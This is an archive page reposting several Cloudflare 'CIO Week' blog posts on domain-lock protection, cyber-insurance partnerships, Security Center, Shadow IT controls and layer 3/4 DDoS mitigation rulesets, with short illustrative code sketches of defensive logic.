Tag Archives: CIO Week

Introducing Cloudflare Domain Protection — Making Domain Compromise a Thing of the Past

Post Syndicated from Eric Brown original https://blog.cloudflare.com/introducing-domain-protection/

Everything on the web starts with a domain name. It is the foundation on which a company’s online presence is built. If that foundation is compromised, the damage can be immense.

As part of CIO Week, we looked at all the biggest risks that companies continue to face online, and how we could address them. The compromise of a domain name remains one of the greatest. There are many ways in which a domain may be hijacked or otherwise compromised, all the way up to the most serious: losing control of your domain name altogether.

You don’t want it to happen to you. Imagine not just losing your website, but all your company’s email, a myriad of systems tied to your corporate domain, and who knows what else. Having an attacker compromise your corporate domain is the stuff of nightmares for every CIO. And if you’re a CIO and it’s not something you’re worrying about, know that we surveyed every other domain registrar and were so unsatisfied with their security practices that we needed to launch our own.

But, now that we have, we want to make domain compromise something that should never, ever happen again. For that reason, we’re excited to announce that we are extending a new level of domain record protection to all our Enterprise customers. We call it Cloudflare Domain Protection, and we’re including it for free for every Cloudflare Enterprise customer. For those customers who have domains secured by Domain Protection, we will also waive all registration and renewal fees on those domains. Cloudflare Domain Protection will be available in Q1 — you can speak to your account manager now to take advantage of the offer.

It’s not possible to build a truly secure domain registrar solution without an understanding of how a domain gets compromised. Before we get into more details of our offering, we wanted to take you on a tour of how a domain can get compromised.

Stealing the Keys to Your Kingdom

There are three types of domain compromises that we often hear about. Let’s take a look at each of them.

Domain Transfers

One of the most serious compromises is an unauthorized transfer of the domain to another registrar. While cooperation amongst registrars has improved greatly over the years, it can still be very difficult to recover a stolen domain. It can often take weeks — or even months. It may require legal action. In a best case scenario, the domain may be recovered in a few days; in the worst case, you may never get it back.

The ability to easily transfer a domain between registrars is vitally important, and is part of what keeps the market for domain registration competitive. However, it also introduces potential risk. The transfer process used by most registries involves using a token to authorize the transfer. Prior to the widespread practice of redacting publicly accessible whois data, an email approval process was also used. To steal a domain, a malicious actor only needs to gain access to the authorization code and be able to remove any domain locks.
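The registry-side check can be reduced to a simple model: a transfer goes through only if the presented authorization code matches and no transfer prohibitions are set. The sketch below is purely illustrative and is not any registry's actual implementation:

```python
# Simplified model of a registry-side transfer check: the transfer
# succeeds only when the authorization code matches and no transfer
# locks are present. Illustrative only.

def transfer_allowed(statuses: set, presented: str, auth_code: str) -> bool:
    locks = {"clientTransferProhibited", "serverTransferProhibited"}
    return presented == auth_code and not (locks & statuses)

# An attacker who steals the auth code still fails while a lock is set:
# transfer_allowed({"clientTransferProhibited"}, "s3cret", "s3cret") is False
```

This is why a thief needs both the authorization code and the removal of any locks before a transfer can proceed.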

Unauthorized transfers often start with a compromised account. In many cases, the customer’s account credentials are stolen outright. In other cases, attackers use elaborate social engineering schemes to take control of the domain, often moving it between registrar accounts before transferring it to another registrar.

Name Server Updates

Name server updates are another way in which domains may be compromised. Whereas a domain transfer is typically an attempt to permanently take over a domain, a name server update is more temporary in nature. However, even though the update can usually be quickly reversed, these types of domain hijacks can be very damaging. They open the possibility of stolen customer data and intercepted email traffic. But most of all: they open an organization up to very serious reputational damage.

Domain Suspensions and Deletions

Most domain suspensions and deletions are not the result of malicious activity, but rather, they often happen through human error or system failures. In many cases, the customer forgets to renew a domain or neglects to update their payment method. In other cases, the registrar mistakenly suspends or deletes a domain.

Regardless of the reason though: the result is a domain that no longer resolves.

While these are certainly not the only ways in which domains may be compromised, they are some of the most damaging. We have spent a lot of time focused on these types of compromises and how to prevent them from happening.

A Different Approach to Domains

Like a lot of folks, we’ve long been frustrated by the state of the domain business. And so this isn’t our first rodeo here.

We already have a registrar service — Cloudflare Registrar — which is open to any Cloudflare customer. We make it super easy to get started, to integrate with Cloudflare, and there’s no markup on our pricing — we promise to never charge you anything more than the wholesale price each TLD charges. The aim: no more “bait and switch” and “endless upsell” (which, according to our customers, are the two most common terms associated with the domain industry). Instead, it’s a registrar that you love. Obviously, it’s Cloudflare, so we incorporated a number of security best practices into how it operates, too.

For our most demanding enterprise customers, we also have Custom Domain Protection. Every client using Custom Domain Protection defines their own process for updating records. As we said when we introduced it: “if a Custom Domain Protection client wants us to not change their domain records unless six different individuals call us, in order, from a set of predefined phone numbers, each reading multiple unique pass codes, and telling us their favorite ice cream flavor, on a Tuesday that is also a full moon, we will enforce that. Literally.”

Yes, it’s secure, but it’s also not the most scalable solution. As a result, we charge a premium for it. As we spoke to our Enterprise customers, however, there was a need for something in between — a Goldilocks solution, so to speak, that offers a high level of protection without being quite so custom.

Enter Cloudflare Domain Protection.

A Triple-Locked Approach

Our approach to securing domains with Domain Protection is quite straightforward: identify the various attack vectors, and design a layered security model to address each potential threat.

Before we take a look at each security layer, it’s important to understand the relationship between registrars and registries, and how that impacts domain security. You can think of registries as the wholesaler of domain names. They manage the central database of all registered domains within the Top-Level-Domain (TLD). They are also responsible for determining the wholesale pricing and establishing TLD specific policies.

Registrars, on the other hand, are the retailer of domains and are responsible for selling the domains to the end user. With each registration, transfer, or renewal, the registrar pays the registry a transaction fee.

Registrars and registries jointly manage domain registrations in what’s called the Shared Registration System (SRS). Registrars communicate with registries using an IETF standard called the Extensible Provisioning Protocol (EPP). Embodied in the EPP standard is a set of domain statuses that registrars and registries can apply to lock a domain and prevent updates, deletions, and transfers (to another registrar).

Registrars are able to apply “client” locks, frequently referred to as Registrar Locks. Registries apply “server” locks, also known as Registry Locks. It’s important to note that the registry locks always supersede the registrar locks. This means that the registrar locks cannot be removed until the registry locks have been removed.
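For illustration, the client/server lock relationship can be expressed with the standard EPP status values. The status names below come from the EPP domain mapping; the classification logic itself is our own sketch:

```python
# EPP status values used for locking (per the EPP domain mapping).
REGISTRAR_LOCKS = {  # "client" locks, set by the registrar
    "clientUpdateProhibited",
    "clientTransferProhibited",
    "clientDeleteProhibited",
}
REGISTRY_LOCKS = {   # "server" locks, set by the registry;
    "serverUpdateProhibited",    # these supersede the client locks
    "serverTransferProhibited",
    "serverDeleteProhibited",
}

def lock_level(statuses: set) -> str:
    """Classify how strongly a domain is locked by its EPP statuses."""
    if REGISTRY_LOCKS <= statuses:
        return "registry-locked"   # strongest: client locks cannot be
                                   # removed until these are lifted
    if REGISTRAR_LOCKS <= statuses:
        return "registrar-locked"
    return "unlocked"
```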

Now, let’s take a closer look at our planned approach.

We start by applying the EPP Registrar Locks to the domain name. These are the EPP client locks that prevent domain updates, transfers, and deletions.

We then apply an internal lock that prevents any API calls to that domain from being processed. This lock functions outside of EPP and is designed to protect the domain should the EPP locks be removed, as well as in situations where an operation may be executed outside of EPP. For example, in some TLDs the domain contact data is only stored at the registrar and never transmitted to the registry. In these cases, it’s important to have a non-EPP locking mechanism.

After the registrar locks are applied, we will request the registry to apply the Registry Locks using a special non-EPP based procedure. It’s important to note that not all registries offer Registry Lock as a service. In some instances, we may not be able to apply this last locking feature.

Lastly, a secure verification procedure is created to handle any future requests to unlock or modify the domain.
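Putting the layers together, the sequence might look like the following in-memory sketch. All names here are hypothetical; this is not Cloudflare's actual implementation:

```python
from dataclasses import dataclass, field

@dataclass
class DomainState:
    epp_statuses: set = field(default_factory=set)  # EPP client locks
    api_locked: bool = False        # internal, non-EPP lock
    registry_locked: bool = False   # out-of-band Registry Lock

def protect_domain(state: DomainState, registry_offers_lock: bool) -> DomainState:
    # 1. Apply the EPP registrar ("client") locks.
    state.epp_statuses |= {
        "clientUpdateProhibited",
        "clientTransferProhibited",
        "clientDeleteProhibited",
    }
    # 2. Internal lock: reject API calls for this domain even if the EPP
    #    locks are removed, or the operation happens outside EPP.
    state.api_locked = True
    # 3. Request Registry Lock via the registry's non-EPP procedure,
    #    where the registry offers the service.
    if registry_offers_lock:
        state.registry_locked = True
    return state
```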

Included Out of the Box

Our aim is to make Cloudflare Domain Protection the most scalable secure solution for domains that’s available. We want to ensure that the domains that matter most to our customers — the mission critical, high value domains — are securely protected.

Eligible domains that are explicitly included under a Cloudflare Enterprise contract may be included in our Domain Protection registration service at no additional cost. And, as we mentioned earlier, this will also cover registration and renewal fees — so not only will securing your domain be one less thing for you to worry about, so too will be paying for it.

Interested in applying Cloudflare Domain Protection to your domain names? Reach out to your account manager and let them know you’re interested. Additional details will be coming in early Q1, 2022.

Cloudflare announces partnerships with leading cyber insurers and incident response providers

Post Syndicated from Deeksha Lamba original https://blog.cloudflare.com/cyber-risk-partnerships/

We are excited to announce our cyber risk partnership program with leading cyber insurance carriers and incident response providers to help our customers reduce their cyber risk. Cloudflare customers can qualify for discounts on premiums or enhanced coverage with our insurance partners, and our incident response partners will work with us to mitigate under-attack scenarios quickly.

What is a business’ cyber risk?

Let’s start with an analogy for security and insurance: being a homeowner is an adventure and a responsibility. You personalize your home, maintain it, and make it secure against the slightest possibility of intrusion: fence it up, lock the doors, install a state-of-the-art security system, and so on. These measures definitely reduce the probability of an intrusion, but you still buy insurance. Why? To cover the rare possibility that something might go wrong: human errors, like leaving the garage door open, or unlikely events, like a fire or hurricane. And when something does go wrong, you call the experts (the police) to investigate and respond to the situation.

Running a business that has any sort of online presence is evolving along the same lines. Getting the right security posture in place is absolutely necessary to protect your business, customers, and employees from nefarious cyber attacks. But as a responsible business owner/CFO/CISO, nevertheless you buy cyber insurance to protect your business from long-tail events that could allow malicious attackers into your environment, causing material damage to your business. And if such an event does take place, you engage with incident response companies for active investigation and mitigation.

In short, you do everything in your control to reduce your business’ cyber risk by having the right security, insurance, and active response measures in place.

The cyber insurance industry and the rise of ransomware attacks

Over the last two years, the rise of ransomware attacks has wreaked havoc on businesses and the cyber insurance industry. As per a Treasury Department report, nearly 600 million dollars in banking transactions were linked to possible ransomware payments in Suspicious Activity Reports (SARs) filed by financial services firms to the U.S. Government for the first six months of 2021, a jump of more than 40% over the total for all of 2020. Additionally, the Treasury Department investigators identified about 5.2 billion dollars in bitcoin transactions as potential ransomware payments, indicating that the actual amount of ransomware payments was much higher.[1]

The rise of these attacks has made, and should continue to make, businesses more cautious: more inclined to have the right cybersecurity posture in place and to buy cyber insurance coverage.

Further, the rising frequency and severity of attacks, especially ransomware attacks, has led to increasing claims and loss ratios for cyber insurers (the loss ratio is how much an insurer pays out in claims divided by the premiums it earns). As per a recent research report, the most frequent types of losses covered by cyber insurers were ransomware (41%), funds transfer loss (27%), and business email compromise incidents (19%). These trends are pushing legacy insurance carriers to reevaluate how much coverage they can afford to offer and how much they have to charge clients to do so, triggering a structural change that can impact the ability of companies, especially small and medium businesses, to minimize their cyber risk.

The end result has been a drastic increase in premiums and denial rates over the last 12 months among some carriers, which has pushed customers to seek new coverage. Premiums have increased upwards of 50%, according to infosec experts and vendors, with some quotes jumping closer to 100%.[2] Also, the lack of accessible cyber insurance and proper coverage disproportionately impacts the small and medium enterprises that find themselves the common target of these cyber attacks. According to a recent research report, 70% of ransomware attacks are aimed at organizations with fewer than 1,000 employees.[3] The increased automation of cyber attacks, coupled with the use of insecure remote access tools during the pandemic, has left these organizations exposed, all while they face increased cyber insurance premiums or no access to coverage.

While some carriers are excluding ransomware payments from customers’ policies or are denying coverage to customers who don’t have the right security measures in place, there is a new breed of insurance carriers that are incentivizing customers in the form of broader coverage or lower prices for proactively implementing cybersecurity controls.

Cloudflare’s cyber risk partnerships

At Cloudflare, we have always believed in making the Internet a better place. We have been helping our customers focus on their core business while we take care of their cyber security. We are now going a step further, helping our customers reduce their cyber risk by partnering with leading cyber insurance underwriters and incident response providers.

Our objective is to help our customers reduce their cyber risk. We are doing so in partnership with several leading companies highlighted below. Our customers can qualify for enhanced coverage and discounted premiums for their cyber insurance policies by leveraging their security posture with Cloudflare.

Insurance companies: Powered by Cloudflare’s security suite, our customers have comprehensive protection against the most common and severe threat vectors. In most cases, when attackers see that a business is using Cloudflare, they realize they will not be able to execute a denial of service (DoS) attack or infiltrate the customer’s network. Knowing the power of Cloudflare, the attackers prefer to spend their time on more vulnerable targets. This means our customers face a lower frequency and severity of attacks: an ideal customer set that could imply a lower loss ratio for underwriters. Our partners understand the security benefits of using Cloudflare’s security suite and are letting our customers qualify for lower premium rates and enhanced coverage.

Cloudflare customers can qualify for discounts/credits on premiums and enhanced coverage with our partners At-Bay, Coalition, and Cowbell Cyber.

“An insurance policy is an effective tool to articulate the impact of security choices on the financial risk of a company. By offering better pricing to companies who implement stronger controls, like Cloudflare’s Comprehensive DDoS Protection, we help customers understand how best to reduce risk. Incentivizing our customers to adopt innovative security solutions like Cloudflare, combined with At-Bay’s free active risk monitoring, has helped reduce ransomware in At-Bay’s portfolio 7x below the market average.”
Rotem Iram,
Co-founder and CEO, At-Bay

“It’s incredible what Cloudflare has done to create a safer Internet. When Cloudflare’s technology is paired with insurance, we are able to protect businesses in an entirely new way. We are excited to offer Cloudflare customers enhanced cyber insurance coverage alongside Coalition’s active security monitoring platform to help businesses build true cyber resilience with an always-on insurance policy.”
Joshua Motta, Co-founder & CEO, Coalition

“We are excited to work with Cloudflare to address our customers’ cybersecurity needs and help reduce their cyber risk. Collaborating with cybersecurity companies like Cloudflare will definitely enable a more data-driven underwriting approach that the industry needs.”
Nate Walsh, Head of Strategic Partnerships, Corvus Insurance

“The complexity and frequency of cyber attacks continue to rise, and small and medium enterprises are increasingly becoming the center of these attacks. Through partners like Cloudflare, we want to encourage these businesses to adopt the best security standards and proactively address vulnerabilities, so they can benefit from savings on their cyber insurance policy premiums.”
Jack Kudale, Founder and CEO, Cowbell Cyber

Incident Response companies: Our incident response partners deal with active under-attack situations day in, day out — helping customers mitigate the attack, and getting their web property and network back online. Too often, precious time is wasted in trying to figure out which security vendor to reach out to and how to get hold of the right team. We are announcing new relationships with prominent incident response providers CrowdStrike, Mandiant, and Secureworks to enable rapid referral of organizations under attack. As a refresher — my colleague, James Espinosa, wrote a great blog post on how Cloudflare helps customers against ransomware DDoS attacks.

“The speed in which a company is able to identify, investigate and remediate a threat heavily determines how it will fare in the end. Our partnership with Cloudflare provides companies the ability to take action rapidly and contain exposure at the time of an attack, enabling them to get back on their feet and return to business as usual as quickly as possible.”
Thomas Etheridge, Senior Vice President, CrowdStrike Services

“As cyber threats continue to rapidly evolve, the need for organizations to put response plans in place increases. Together, Mandiant and Cloudflare are enabling our mutual customers to mitigate the risk breaches pose to their business operations. We hope to see more of these much-needed technology collaborations that help organizations address the growing threat of ransomware and DDoS attacks in a timely manner.”
Marshall Heilman, EVP & Chief Technology Officer, Mandiant

“Secureworks’ proactive incident response and adversarial testing expertise combined with Cloudflare’s intelligent global platform enables our mutual customers to better mitigate the threats of sophisticated cyberattacks. This partnership is a much needed approach to addressing advanced cyber threats with speed and automation.”
Chris Bell, Vice President – Strategic Alliances, Secureworks

What’s next?

In summary, Cloudflare and its partners are coming together to ensure that our customers can run their business while getting adequate cybersecurity and risk coverage. However, we will not stop here. In the coming months, we’ll be working on creating programmatic ways to share threat intelligence with our cyber risk partners. Through our Security Center, we want to enable our customers, if they so choose, to safely share their security posture information with our partners for easier, transparent underwriting. Given the scale of our network and the magnitude and heterogeneity of attacks that we witness, we are in a strong position to provide our partners with insights around long-tail risks.

If you are interested in learning more, please refer to the partner links (At-Bay, Coalition, and Cowbell Cyber) or visit our cyber risk partnership page. If you’re interested in becoming a partner, please fill out this form.

Sources:
[1] https://www.wsj.com/articles/suspected-ransomware-payments-for-first-half-of-2021-total-590-million-11634308503
[2] Gallagher, Cyber Insurance Market Update, Mid-year 2021: https://www.ajg.com/us/news-and-insights/2021/aug/global-cyber-market-update/
[3] https://searchsecurity.techtarget.com/news/252507932/Cyber-insurance-premiums-costs-skyrocket-as-attacks-surge

Introducing Cloudflare Security Center

Post Syndicated from Malavika Balachandran Tadeusz original https://blog.cloudflare.com/security-center/

Today we are launching Cloudflare Security Center, which brings together our suite of security products, our security expertise, and unique Internet intelligence as a unified security intelligence solution.

Cloudflare was launched in 2009 to help build a better Internet and make Internet performance and security accessible to everyone. Over the last twelve years, we’ve disrupted the security industry and launched a broad range of products to address our customers’ pain points across Application Security, Network Security, and Enterprise Security.

While there are a plethora of solutions on the market to solve specific pain points, we’ve architected Cloudflare One as a unified platform to holistically address our customers’ most pressing security challenges.  As part of this vision, we are extremely excited to launch the public beta of Security Center. Our goal is to help customers understand their attack surface and quickly take action to reduce their risk of an incident.

Starting today, all Cloudflare users can use Security Center (available in your Cloudflare dashboard) to map their attack surface, review potential security risks and threats to their organizations, and mitigate these risks with a few clicks.

The changing corporate attack surface

A year ago, we announced Cloudflare One to address the complex nature of corporate networking today. The proliferation of public cloud, SaaS applications, mobile devices, and remote work has made the traditional model of the corporate network obsolete. The Internet is the new enterprise WAN, necessitating a novel approach to the way security teams manage their attack surface.

The way we build applications has also changed. Web applications today heavily use open source code and third-party scripts. Earlier this year we announced Page Shield, now GA, to help our customers track and monitor their third-party JavaScript dependencies.

These transformations in the IT landscape, coupled with the natural evolution that every organization goes through — such as growth, attrition, and M&A activity — create significant complexity for IT and security teams to stay on top of their organization’s ever-changing attack surface.

The importance of attack surface management

An attack surface refers to the entire IT footprint of an organization that is susceptible to cyberattacks. Your attack surface consists of all the corporate servers, devices, SaaS, and cloud assets that are accessible from the Internet.

Over the last six months, something we’ve heard consistently from our customers is that they often don’t have a good grasp of their attack surface.

Because of the ease of creating new resources with the public cloud or SaaS, IT teams struggle to stay on top of shadow IT resources. Even when IT is aware of new infrastructure being spun up by dev teams, ensuring that these new resources are configured in line with corporate security standards is a constant battle.

It’s not only new resources that cause problems for IT teams — IT teams also want to quickly identify and decommission forgotten websites or applications that may have sensitive data or expose their organization to potential security risks.

These challenges are further complicated by the use of third-party software. Open source code, JavaScript libraries, SaaS applications, or self-hosted software introduce supply-chain risk into your attack surface. Security teams want to monitor potential vulnerabilities and malicious dependencies in third-party software.

Lastly, external threats add to your organization’s attack surface. Security teams want to quickly identify and take down rogue assets created by malicious actors. These rogue assets are often phishing sites or malware distribution points that attempt to trick the organization’s customers or employees into providing sensitive details or downloading a file.

The challenges of attack surface management

With such an expansive list of potential risks and threats to an organization, it’s no surprise that organizations of all sizes are struggling to keep up with their attack surface. Many of our customers have built in-house solutions or use a range of security products to ascertain and monitor their attack surface.

But we’ve consistently heard from our customers that these solutions just don’t work. They are often too noisy and produce far too many alerts, making it difficult for security teams to triage and prioritize issues. Customers are also tired of security vendor sprawl and don’t want to add yet another tool to integrate with their existing security solutions. Security teams have limited resources — across staff and budget — and they want a solution that creates less, not more, work.

Introducing Cloudflare Security Center

In order to make attack surface management accessible and actionable for all organizations, we are excited to launch Cloudflare Security Center. Security Center is a single place to map your attack surface, identify potential security risks, and mitigate risks with a few clicks.

Starting today, you’ll find “Security Center” in your Account Home page.

Once you navigate to Security Center within the Cloudflare dashboard, you’ll find two new features:

  • Security Insights: Review and manage potential security risks and vulnerabilities associated with your IT infrastructure.
  • Infrastructure: Review and manage your IT infrastructure.

In today’s release, if you navigate to Security Insights, you can view a log of potential security risks, vulnerabilities, and insecure configurations associated with your IT infrastructure on Cloudflare. Our security experts have helped curate our automated detections to help you quickly triage and address the most critical issues impacting your attack surface.

If this is your first time using Security Center, you will need to click Start scan to consent to Cloudflare scanning your infrastructure. Once you opt in to Security Center, we will scan your infrastructure on a regular schedule:

  • If you have any Pro or higher plan zones, or are using Teams Standard or higher, after opting in to Security Center, we will scan your infrastructure on a daily basis.
  • For all other Cloudflare plans, after opting in to Security Center, we will scan your infrastructure every three days.
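The cadence above reduces to a small rule. This is assumed logic for illustration only, not Cloudflare's actual scheduler:

```python
def scan_interval_days(has_pro_or_higher_zone: bool,
                       has_teams_standard_or_higher: bool) -> int:
    """Days between Security Center scans, per the plan rules above."""
    if has_pro_or_higher_zone or has_teams_standard_or_higher:
        return 1   # daily scans
    return 3       # every three days for all other plans
```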

After every scan, you can visit the Security Insights page to view a high level summary of your attack surface and dig into the specifics of any potential security risks we have identified.

Directly from Security Insights, you can resolve any insights by making the recommended changes to your Cloudflare configurations in just a few clicks.

With each scan, we inventory your IT assets on Cloudflare as part of the Infrastructure feature within Security Center. Here, you can view a summary of your domains on Cloudflare. At the top of the page, you can find a breakdown of your DNS records by Proxy Usage. Below this chart, you can review a list of all your domains on Cloudflare, as well as view other key details about your domains.

What’s next

All features made available as part of today’s Security Center beta release are included in your existing Cloudflare plan. It’s our mission to help build a better Internet, and we believe that making attack surface management accessible and actionable is an important part of that mission. We want everyone, from an individual web developer to the CIO of a Fortune 100 company, to be able to easily secure their IT footprint.

You can get started today with Security Center’s beta release by visiting your Cloudflare dashboard. With just a few clicks, you can ensure that your Cloudflare settings are optimized for your organization’s security.

We’d love your feedback on Security Center. If you have any comments, questions or concerns, you can contact us directly at [email protected], or on our Cloudflare Community forum.

Stay tuned for further updates, as we continue to add more features to Security Center. Soon, you’ll be able to control not only your IT assets on Cloudflare, but your entire IT footprint. We’ll continue to build upon our risk detection capabilities, going beyond Application Security to Network Security, Enterprise Security, and Brand Security.

Shadow IT: make it easy for users to follow the rules

Post Syndicated from Kenny Johnson original https://blog.cloudflare.com/shadow-it/

SaaS application usage has exploded over the last decade. According to Gartner, global spending on SaaS in 2021 was $145bn and is forecasted to reach $171bn in 2022. A key benefit of SaaS applications is that they are easy to get started with and either free or low cost. This is great for both users and leaders — it’s easy to try out new tools with no commitment or procurement process. But this convenience also presents a challenge to CIOs and security teams. Many SaaS applications are great for a specific task, but lack required security controls or visibility. It can be easy for employees to start using SaaS applications for their everyday job without IT teams noticing — these “unapproved” applications are popularly referred to as Shadow IT.

CIOs often have no visibility into what SaaS applications their employees are using. Even when they do, they may not have an easy way to block users from using unapproved applications, or, conversely, to provide easy access to approved ones.

Visibility into application usage

In an office, it was easier for CIOs and their teams to monitor application usage in their organization. Mechanisms existed to inspect outbound DNS and HTTP traffic on office network equipment and detect unapproved applications. In an office setting, IT teams could also notice colleagues using new SaaS applications or hear them mention these new applications. When users moved to remote work due to COVID-19 and other factors, this was no longer possible, and network-driven logging became ineffective. With no central network, the focus of application monitoring needed to shift to users' devices.

We’re excited to announce updates to Cloudflare for Teams that address Shadow IT challenges. Our Zero Trust platform provides a framework to identify new applications, block applications and provide a single location for approved applications. Cloudflare Gateway allows admins to monitor user traffic and detect new application usage. Our Shadow IT report then presents a list of new applications and allows for approval or rejection of each application.

This gives CIOs in-depth understanding of what applications are being used across their business, and enables them to come up with a plan to allow and block applications based on their approval status in the organization.

Blocking the right applications

Once the list of "shadow" applications is known, the next step is to block these applications with a meaningful error message that steers the user toward an approved application. The point is not to make users feel they have done something wrong, but to encourage them and point them to the right application to use.

Cloudflare Gateway allows teams to configure policies to block unapproved applications and provide clear instructions to a user about what their alternatives are to that application. In Gateway, administrators can configure application-specific policies like “block all file sharing applications except Google Drive.” Tenant control can be utilized to restrict access to specific instances of a given application to prevent personal account usage of these tools.
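
Conceptually, a policy like "block all file sharing applications except Google Drive" boils down to a blocked category plus an allowlist. The sketch below is our own illustration of that semantics; the app names, categories, and evaluation logic are assumptions, not Gateway's actual engine or API:

```javascript
// A blocked application category with an allowlisted exception.
// (Illustrative only; names and shapes are invented for this example.)
const policy = {
  blockCategory: "file-sharing",
  allowlist: new Set(["Google Drive"]),
};

function evaluate(app, policy) {
  if (app.category === policy.blockCategory && !policy.allowlist.has(app.name)) {
    return {
      action: "block",
      // The block page can carry a meaningful message pointing at the
      // approved alternative, instead of a bare connection error.
      message: `This app is not approved. Please use ${[...policy.allowlist].join(", ")} instead.`,
    };
  }
  return { action: "allow" };
}
```

Under this model, a request to Dropbox would be blocked with a message suggesting Google Drive, while Google Drive itself passes through untouched.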

Protect your approved applications

The next step is to protect the application you do want your users to use. In order to fully protect your SaaS applications, it is important to secure the initial authorization and maintain a clear audit trail of user activity. Cloudflare Access for SaaS allows administrators to protect the front door of their SaaS applications and verify user identity, multi-factor authentication, device posture and location before allowing access. Gateway then provides a clear audit trail of all user activity within the application to provide a clear picture in the case of a breach or other security events.

This allows CIOs and their teams to define which users may or may not access specific applications. Instead of creating broad access lists, they can define exactly which users need a specific tool to complete their job. This is beneficial for both security and licensing costs.

Show your users the applications they need

The final challenge is making it clear to users which applications they do and do not have access to. New employees often spend their first few weeks discovering new applications that would have helped them get up to speed more quickly.

We wanted to make it easy to provide a single place for users to access all of their approved applications. We added bookmarks and application visibility control to the Access application launcher to make this even easier.

Once all your applications are available through the application launcher, we log all user activity across these applications. And even better, many of these applications are hosted on Cloudflare which leads to performance improvements overall.

Getting started with the Access application launcher is easy and free for the first 50 users! Get started today from the Cloudflare for Teams dashboard.

How to customize your layer 3/4 DDoS protection settings

Post Syndicated from Omer Yoachimik original https://blog.cloudflare.com/l34-ddos-managed-rules/

After initially providing our customers control over the HTTP-layer DDoS protection settings earlier this year, we’re now excited to extend the control our customers have to the packet layer. Using these new controls, Cloudflare Enterprise customers using the Magic Transit and Spectrum services can now tune and tweak their L3/4 DDoS protection settings directly from the Cloudflare dashboard or via the Cloudflare API.

The new functionality provides customers control over two main DDoS rulesets:

  1. Network-layer DDoS Protection ruleset — This ruleset includes rules to detect and mitigate DDoS attacks on layer 3/4 of the OSI model such as UDP floods, SYN-ACK reflection attacks, SYN floods, and DNS floods. This ruleset is available for Spectrum and Magic Transit customers on the Enterprise plan.
  2. Advanced TCP Protection ruleset — This ruleset includes rules to detect and mitigate sophisticated out-of-state TCP attacks such as spoofed ACK floods, randomized SYN floods, and distributed SYN-ACK reflection attacks. This ruleset is available for Magic Transit customers only.

To learn more, review our DDoS Managed Ruleset developer documentation. We’ve put together a few guides that we hope will be helpful for you:

  1. Onboarding & getting started with Cloudflare DDoS protection
  2. Handling false negatives
  3. Handling false positives
  4. Best practices when using VPNs, VoIP, and other third-party services
  5. How to simulate a DDoS attack

Cloudflare’s DDoS Protection

A Distributed Denial of Service (DDoS) attack is a type of cyberattack that aims to disrupt the victim’s Internet services. There are many types of DDoS attacks, and they can be generated by attackers at different layers of the Internet. One example is the HTTP flood. It aims to disrupt HTTP application servers such as those that power mobile apps and websites. Another example is the UDP flood. While this type of attack can be used to disrupt HTTP servers, it can also be used in an attempt to disrupt non-HTTP applications. These include TCP-based and UDP-based applications, networking services such as VoIP services, gaming servers, cryptocurrency, and more.

To defend organizations against DDoS attacks, we built and operate software-defined systems that run autonomously. They automatically detect and mitigate DDoS attacks across our entire network. You can read more about our autonomous DDoS protection systems and how they work in our deep-dive technical blog post.

Unmetered and unlimited DDoS Protection

The level of protection that we offer is unmetered and unlimited: it is not bounded by the size of the attack, the number of attacks, or their duration. This is especially important these days because, as we've recently seen, attacks are getting larger and more frequent. In Q3 alone, network-layer attacks increased by 44% compared to the previous quarter. Furthermore, just recently, our systems automatically detected and mitigated a DDoS attack that peaked just below 2 Tbps — the largest we've seen to date.

Mirai botnet launched an almost 2 Tbps DDoS attack

Read more about recent DDoS trends.

Managed Rulesets

You can think of our autonomous DDoS protection systems as groups (rulesets) of intelligent rules. There are rulesets of HTTP DDoS Protection rules, Network-layer DDoS Protection rules and Advanced TCP Protection rules. In this blog post, we will cover the latter two rulesets. We’ve already covered the former in the blog post How to customize your HTTP DDoS protection settings.

Cloudflare L3/4 DDoS Managed Rules

In the Network-layer DDoS Protection ruleset, each rule has a unique set of conditional fingerprints, dynamic field masking, activation thresholds, and mitigation actions. These rules are managed (by Cloudflare), meaning that the specifics of each rule are curated in-house by our DDoS experts. Before deploying a new rule, it is first rigorously tested and optimized for mitigation accuracy and efficiency across our entire global network.

In the Advanced TCP Protection ruleset, we use a novel TCP state classification engine to identify the state of TCP flows. The engine powering this ruleset is flowtrackd — you can read more about it in our announcement blog post. One of the unique features of this system is that it is able to operate using only the ingress (inbound) packet flows. The system sees only the ingress traffic and is able to drop, challenge, or allow packets based on their legitimacy. For example, a flood of ACK packets that don’t correspond to open TCP connections will be dropped.
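
As a rough illustration of the out-of-state idea, here is a toy model of our own (flowtrackd's real engine is far more sophisticated): track flows from ingress packets only, and drop ACKs that match no known flow.

```javascript
// Flows we have seen open, keyed by their 4-tuple.
// (Toy model only; real state tracking covers the full TCP state machine.)
const flows = new Set();

function flowKey(pkt) {
  return `${pkt.srcIp}:${pkt.srcPort}->${pkt.dstIp}:${pkt.dstPort}`;
}

function handlePacket(pkt) {
  if (pkt.flags === "SYN") {
    flows.add(flowKey(pkt)); // remember the opening handshake
    return "allow";
  }
  if (pkt.flags === "ACK" && !flows.has(flowKey(pkt))) {
    return "drop"; // ACK with no corresponding open connection
  }
  return "allow";
}
```

With this scheme, a flood of spoofed ACK packets never matches an opened flow, so each one is dropped without any need to see the egress side of the connection.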

How attacks are detected and mitigated

Sampling

Initially, traffic is routed through the Internet via BGP Anycast to the nearest Cloudflare edge data center. Once the traffic reaches our data center, our DDoS systems sample it asynchronously, allowing for out-of-path analysis of traffic without introducing latency penalties. The Advanced TCP Protection ruleset needs to view the entire packet flow, and so it sits inline for Magic Transit customers only. It, too, does not introduce any latency penalties.

Analysis & mitigation

The analysis for the Advanced TCP Protection ruleset is straightforward and efficient. The system qualifies TCP flows and tracks their state. In this way, packets that don’t correspond to a legitimate connection and its state are dropped or challenged. The mitigation is activated only above certain thresholds that customers can define.

The analysis for the Network-layer DDoS Protection ruleset is done using data streaming algorithms. Packet samples are compared to the conditional fingerprints and multiple real-time signatures are created based on the dynamic masking. Each time another packet matches one of the signatures, a counter is increased. When the activation threshold is reached for a given signature, a mitigation rule is compiled and pushed inline. The mitigation rule includes the real-time signature and the mitigation action, e.g., drop.

Example

As a simple example, one fingerprint could include the following fields: source IP, source port, destination IP, and the TCP sequence number. A packet flood attack with a fixed sequence number would match the fingerprint and the counter would increase for every packet match until the activation threshold is exceeded. Then a mitigation action would be applied.

However, in the case of a spoofed attack where the source IP addresses and ports are randomized, we would end up with multiple signatures for each combination of source IP and port. Assuming a sufficiently randomized/distributed attack, the activation thresholds would not be met and mitigation would not occur. For this reason, we use dynamic masking, i.e. ignoring fields that may not be a strong indicator of the signature. By masking (ignoring) the source IP and port, we would be able to match all the attack packets based on the unique TCP sequence number regardless of how randomized/distributed the attack is.
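
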